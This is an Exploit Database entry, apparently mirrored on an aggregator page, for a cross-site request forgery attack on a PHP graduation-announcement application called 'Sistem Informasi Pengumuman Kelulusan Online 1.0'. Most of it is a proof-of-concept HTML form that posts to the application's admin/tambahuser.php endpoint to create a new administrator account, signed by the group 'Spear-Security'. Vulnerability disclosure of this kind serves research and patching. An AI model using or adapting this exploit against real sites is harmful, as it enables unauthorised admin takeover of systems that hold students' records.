Sistem Informasi Pengumuman Kelulusan Online 1.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 12 阅读

• 作者： Extinction
  日期： 2020-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48571/

• # Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
  # Google Dork: N/A
  # Date: 2020-06-10
  # Exploit Author: Extinction
  # Vendor Homepage: https://adikiss.net/
  # Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/
  # Version: latest
  # Tested on: Linux,windows,macOS
  
  # Description SpearSecurity :
  # CSRF vulnerability was discovered in Sistem kelulusan.
  # With this vulnerability, authorized users can be added to the system.
  
  POC:
  
  <html>
  <body>
  <center>
  <hr>
  <form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
  <input type="text" class="form-control" name="nama"
  placeholder="Username" size="35">
  <br>
  <input type="text" class="form-control" name="username"
  placeholder="Spear" size="35">
  <br>
  <input type="text" class="form-control" name="pass"
  placeholder="Security" size="35">
  <br>
  <br>
  <input type="submit" name="submit" id="submit" value="Simpan Data"
  class="btn btn-primary" onclick="tb_remove()">
  </form>
  <hr>
  <h1> CODED BY SPEAR-SECURITY </h1>
  <h2> Author Extinction </h2>
  </body>
  </html>
  
  #SpearSecurity-ID